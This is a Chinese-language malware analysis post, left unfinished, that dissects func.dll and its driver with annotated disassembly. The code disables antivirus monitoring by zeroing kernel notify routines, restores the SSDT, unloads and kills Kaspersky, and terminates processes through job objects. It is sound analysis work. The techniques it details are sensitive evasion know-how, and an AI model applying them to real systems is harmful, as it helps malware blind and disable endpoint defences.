未完的病毒分析func.dll

这个dll会释放出一个驱动，于是就被这个诡异的驱动迷惑了很久。后来上网一查发现几个月前在看雪看到的一个帖就是这个病毒的，而且我搞错了对象了，dll调用的sys很早就释放了出来orz。
DllMain没什么好说的，就将hModule保存起来并且调用OpenProcessToken、LookupPrivilegeValue跟AdjustTokenPrivileges提升进程权限。
droqp函数的分析如下：

引用

.text:10004340                 lea     eax, [ebp+SystemTime]
.text:10004343                 push    eax             ; lpSystemTime
.text:10004344                 call    ds:GetSystemTime
.text:1000434A                 cmp     [ebp+SystemTime.wYear], 7D7h ; 年份早于2007年则退出
.text:10004350                 jbe     loc_10004426
.text:10004356                 mov     esi, 104h
.text:1000435B                 lea     eax, [ebp+FileName]
.text:10004361                 push    esi             ; uSize
.text:10004362                 push    eax             ; lpBuffer
.text:10004363                 call    ds:GetWindowsDirectoryA
.text:10004369                 lea     eax, [ebp+FileName]
.text:1000436F                 push    offset aSystem32Driver ; "\\system32\\drivers"
.text:10004374                 push    eax             ; Dest
.text:10004375                 call    strcat
.text:1000437A                 lea     eax, [ebp+FileName]
.text:10004380                 push    offset aAcpiec_sys ; "\\acpiec.sys"
.text:10004385                 push    eax             ; Dest
.text:10004386                 call    strcat
.text:1000438B                 add     esp, 10h
.text:1000438E                 cmp     [ebp+SystemTime.wYear], 7D8h
.text:10004394                 jbe     short loc_100043AC
.text:10004396                 lea     eax, [ebp+FileName]
.text:1000439C                 push    eax             ; lpFileName
.text:1000439D                 push    offset hFile    ; "SYS"
.text:100043A2                 push    67h             ; hResInfo
.text:100043A4                 call    sub_10001000    ; 释放acpiec.sys到system32\drivers\目录下
.text:100043A9                 add     esp, 0Ch
.text:100043AC
.text:100043AC loc_100043AC:                           ; CODE XREF: droqp+ACj
.text:100043AC                 lea     eax, [ebp+FileName]
.text:100043B2                 push    eax             ; lpBinaryPathName
.text:100043B3                 call    sub_10003F22    ; 装载acpiec.sys
.text:100043B8                 pop     ecx
.text:100043B9                 xor     ebx, ebx
.text:100043BB                 push    ebx             ; hTemplateFile
.text:100043BC                 push    80h             ; dwFlagsAndAttributes
.text:100043C1                 push    3               ; dwCreationDisposition
.text:100043C3                 push    ebx             ; lpSecurityAttributes
.text:100043C4                 push    ebx             ; dwShareMode
.text:100043C5                 push    0C0000000h      ; dwDesiredAccess
.text:100043CA                 push    offset FileName ; "\\\\.\\CMusic"
.text:100043CF                 call    ds:CreateFileA  ; 打开的却是另一个驱动orz
.text:100043D5                 cmp     eax, 0FFFFFFFFh
.text:100043D8                 mov     [ebp+lpParameter], eax
.text:100043DB                 jz      short loc_10004400
.text:100043DD                 mov     edi, ds:GetSystemDirectoryA
.text:100043E3                 lea     eax, [ebp+FileName]
.text:100043E9                 push    esi             ; uSize
.text:100043EA                 push    eax             ; lpBuffer
.text:100043EB                 call    edi ; GetSystemDirectoryA
.text:100043ED                 lea     eax, [ebp+FileName]
.text:100043F3                 push    esi             ; uSize
.text:100043F4                 push    eax             ; lpBuffer
.text:100043F5                 call    edi ; GetSystemDirectoryA
.text:100043F7                 push    [ebp+lpParameter] ; Handle of \\.\CMusic
.text:100043FA                 call    sub_1000417D    ; 利用特征码在ntoskrl.exe里面找SSDT的偏移地址并与驱动通信还原SSDT
.text:100043FF                 pop     ecx
.text:10004400
.text:10004400 loc_10004400:                           ; CODE XREF: droqp+F3j
.text:10004400                 mov     esi, ds:Sleep
.text:10004406                 push    3E8h            ; dwMilliseconds
.text:1000440B                 call    esi ; Sleep
.text:1000440D                 push    ebx             ; lpThreadId
.text:1000440E                 push    ebx             ; dwCreationFlags
.text:1000440F                 push    [ebp+lpParameter] ; lpParameter
.text:10004412                 push    offset StartAddress ; lpStartAddress
.text:10004417                 push    ebx             ; dwStackSize
.text:10004418                 push    ebx             ; lpThreadAttributes
.text:10004419                 call    ds:CreateThread ; 开启工作线程
.text:1000441F                 push    1D4C0h          ; dwMilliseconds
.text:10004424                 call    esi ; Sleep

当初看到释放的驱动，分析了N久也没找到看雪上的牛人说的恢复SSDT跟杀进程的代码，更要命的是acpiec.sys连符号链接都没创建……后来看了一下加载的\\.\CMusic是另外一个病毒文件释放出来的orz
工作线程先是列出了一对杀毒软件的名，然后再用ToolHelp32函数来枚举进程，不过不知道是不是我这个func.dll跟别人的不同……只是枚举进程却没有杀进程的操作，就光杀了一个卡巴斯基：

引用

.text:10001254                 push    ebp
.text:10001255                 mov     ebp, esp
.text:10001257                 sub     esp, 224h
.text:1000125D                 push    ebx
.text:1000125E                 push    [ebp+dwProcessId] ; th32ProcessID
.text:10001261                 push    8               ; dwFlags
.text:10001263                 call    CreateToolhelp32Snapshot
.text:10001268                 mov     ebx, eax
.text:1000126A                 cmp     ebx, 0FFFFFFFFh
.text:1000126D                 jz      loc_10001328
.text:10001273                 lea     eax, [ebp+me]
.text:10001279                 mov     [ebp+me.dwSize], 224h
.text:10001283                 push    eax             ; lpme
.text:10001284                 push    ebx             ; hSnapshot
.text:10001285                 call    Module32First
.text:1000128A                 test    eax, eax
.text:1000128C                 jnz     short loc_1000129A
.text:1000128E                 push    ebx             ; hObject
.text:1000128F                 call    ds:CloseHandle
.text:10001295                 jmp     loc_10001328
.text:1000129A ; ---------------------------------------------------------------------------
.text:1000129A
.text:1000129A loc_1000129A:                           ; CODE XREF: sub_10001254+38j
.text:1000129A                 push    esi
.text:1000129B                 mov     esi, ds:OutputDebugStringA
.text:100012A1                 push    edi
.text:100012A2                 mov     edi, ds:strstr
.text:100012A8
.text:100012A8 loc_100012A8:                           ; CODE XREF: sub_10001254+C9j
.text:100012A8                 lea     eax, [ebp+me.szExePath]
.text:100012AE                 push    eax             ; lpOutputString
.text:100012AF                 call    esi ; OutputDebugStringA
.text:100012B1                 lea     eax, [ebp+me.szExePath]
.text:100012B7                 push    offset SubStr   ; ".kdl"
.text:100012BC                 push    eax             ; Str
.text:100012BD                 call    edi ; strstr
.text:100012BF                 pop     ecx
.text:100012C0                 test    eax, eax
.text:100012C2                 pop     ecx
.text:100012C3                 jz      short loc_100012E9
.text:100012C5                 push    [ebp+me.hModule] ; lpParameter
.text:100012CB                 push    [ebp+dwProcessId] ; dwProcessId
.text:100012CE                 call    sub_10001201    ; 创建远程线程令avp.exe卸载kdl模块
.text:100012D3                 pop     ecx
.text:100012D4                 lea     eax, [ebp+me.szExePath]
.text:100012DA                 pop     ecx
.text:100012DB                 push    eax             ; lpOutputString
.text:100012DC                 call    esi ; OutputDebugStringA
.text:100012DE                 push    3E8h            ; dwMilliseconds
.text:100012E3                 call    ds:Sleep
.text:100012E9
.text:100012E9 loc_100012E9:                           ; CODE XREF: sub_10001254+6Fj
.text:100012E9                 lea     eax, [ebp+me.szExePath]
.text:100012EF                 push    offset aAvp_exe ; "avp.exe"
.text:100012F4                 push    eax             ; Str
.text:100012F5                 call    edi ; strstr
.text:100012F7                 pop     ecx
.text:100012F8                 test    eax, eax
.text:100012FA                 pop     ecx
.text:100012FB                 jz      short loc_1000130E
.text:100012FD                 lea     eax, [ebp+me.szExePath]
.text:10001303                 push    eax             ; Source
.text:10001304                 push    [ebp+Dest]      ; Dest
.text:10001307                 call    strcpy
.text:1000130C                 pop     ecx
.text:1000130D                 pop     ecx
.text:1000130E
.text:1000130E loc_1000130E:                           ; CODE XREF: sub_10001254+A7j
.text:1000130E                 lea     eax, [ebp+me]
.text:10001314                 push    eax             ; lpme
.text:10001315                 push    ebx             ; hSnapshot
.text:10001316                 call    Module32Next
.text:1000131B                 test    eax, eax
.text:1000131D                 jnz     short loc_100012A8
.text:1000131F                 push    ebx             ; hObject
.text:10001320                 call    ds:CloseHandle
.text:10001326                 pop     edi
.text:10001327                 pop     esi
.text:10001328
.text:10001328 loc_10001328:                           ; CODE XREF: sub_10001254+19j
.text:10001328                                         ; sub_10001254+41j
.text:10001328                 pop     ebx
.text:10001329                 leave
.text:1000132A                 retn
.text:1000132A sub_10001254    endp

这段代码是通过枚举卡巴的模块来查找kdl模块，找到就给卡巴创建一条远程线程来卸载它，然后就是WinExec执行两条命令来杀掉卡巴。
驱动部分：
先在DriverEntry调用以下函数：

引用

.text:00011BEE                 push    ebp
.text:00011BEF                 mov     ebp, esp
.text:00011BF1                 push    ecx
.text:00011BF2                 push    ecx
.text:00011BF3                 push    esi
.text:00011BF4                 mov     esi, ds:RtlInitUnicodeString
.text:00011BFA                 push    edi
.text:00011BFB                 push    offset word_11B2A ; SourceString=PsRemoveLoadImageNotifyRoutine
.text:00011C00                 lea     eax, [ebp+DestinationString]
.text:00011C03                 push    eax             ; DestinationString
.text:00011C04                 call    esi ; RtlInitUnicodeString
.text:00011C06                 mov     edi, ds:MmGetSystemRoutineAddress
.text:00011C0C                 lea     eax, [ebp+DestinationString]
.text:00011C0F                 push    eax             ; SystemRoutineName
.text:00011C10                 call    edi ; MmGetSystemRoutineAddress
.text:00011C12                 push    eax
.text:00011C13                 call    sub_11AFE
.text:00011C18                 push    offset word_11B6A ; SourceString=PsSetCreateProcessNotifyRoutine
.text:00011C1D                 lea     eax, [ebp+DestinationString]
.text:00011C20                 push    eax             ; DestinationString
.text:00011C21                 call    esi ; RtlInitUnicodeString
.text:00011C23                 lea     eax, [ebp+DestinationString]
.text:00011C26                 push    eax             ; SystemRoutineName
.text:00011C27                 call    edi ; MmGetSystemRoutineAddress
.text:00011C29                 push    eax
.text:00011C2A                 call    sub_11AFE
.text:00011C2F                 push    offset word_11BAA ; SourceString=PsRemoveCreateThreadNotifyRoutine
.text:00011C34                 lea     eax, [ebp+DestinationString]
.text:00011C37                 push    eax             ; DestinationString
.text:00011C38                 call    esi ; RtlInitUnicodeString
.text:00011C3A                 lea     eax, [ebp+DestinationString]
.text:00011C3D                 push    eax             ; SystemRoutineName
.text:00011C3E                 call    edi ; MmGetSystemRoutineAddress
.text:00011C40                 push    eax
.text:00011C41                 call    sub_11AFE
.text:00011C46                 pop     edi
.text:00011C47                 pop     esi
.text:00011C48                 leave
.text:00011C49                 retn
.text:00011C49 sub_11BEE       endp

引用

sub_11AFE       proc near               ; CODE XREF: sub_11BEE+25p
.text:00011AFE                                         ; sub_11BEE+3Cp ...
.text:00011AFE
.text:00011AFE arg_0           = dword ptr  4
.text:00011AFE
.text:00011AFE                 mov     eax, [esp+arg_0]
.text:00011B02                 test    eax, eax
.text:00011B04                 jz      short loc_11B14
.text:00011B06                 xor     ecx, ecx
.text:00011B08
.text:00011B08 loc_11B08:                              ; CODE XREF: sub_11AFE+14j
.text:00011B08                 cmp     byte ptr [eax], 0BFh ; 查找特征码
.text:00011B0B                 jz      short loc_11B18
.text:00011B0D                 inc     eax
.text:00011B0E                 inc     ecx
.text:00011B0F                 cmp     ecx, 14h
.text:00011B12                 jl      short loc_11B08
.text:00011B14
.text:00011B14 loc_11B14:                              ; CODE XREF: sub_11AFE+6j
.text:00011B14                 xor     al, al
.text:00011B16                 jmp     short locret_11B26
.text:00011B18 ; ---------------------------------------------------------------------------
.text:00011B18
.text:00011B18 loc_11B18:                              ; CODE XREF: sub_11AFE+Dj
.text:00011B18                 push    edi
.text:00011B19                 mov     edi, [eax+1]    ; 监控例程地址
.text:00011B1C                 push    8
.text:00011B1E                 pop     ecx
.text:00011B1F                 xor     eax, eax        ; 填0
.text:00011B21                 rep stosd
.text:00011B23                 mov     al, 1
.text:00011B25                 pop     edi
.text:00011B26
.text:00011B26 locret_11B26:                           ; CODE XREF: sub_11AFE+18j
.text:00011B26                 retn    4
.text:00011B26 sub_11AFE       endp

上面这段代码是查找PsRemoveLoadImageNotifyRoutine、PsSetCreateProcessNotifyRoutine、PsRemoveCreateThreadNotifyRoutine三个函数中的特征码例如bfe0a35580 mov      edi,offset nt!PspCreateProcessNotifyRoutine 获取监控例程的地址然后直接填0，令杀毒软件的监控失效。
接下来是IRP_MJ_DEVICE_CONTROL回调例程，响应两个操作码，分别是22E153h跟22E14Bh。前者是将传入的ProcessID调用ZwOpenProcess-》ZwCreateJobObject-》ZwAssignProcessToJobObject-》ZwTerminateJobObjcet来结束进程。后者是还原SSDT，代码很简单就不帖了。
func.dll只要是杀杀毒软件的。而phpi.dll才是实际干坏事的：包括修改host文件，下载木马、释放一个穿透还原的驱动。时间不足加上精力不足，就不分析了orz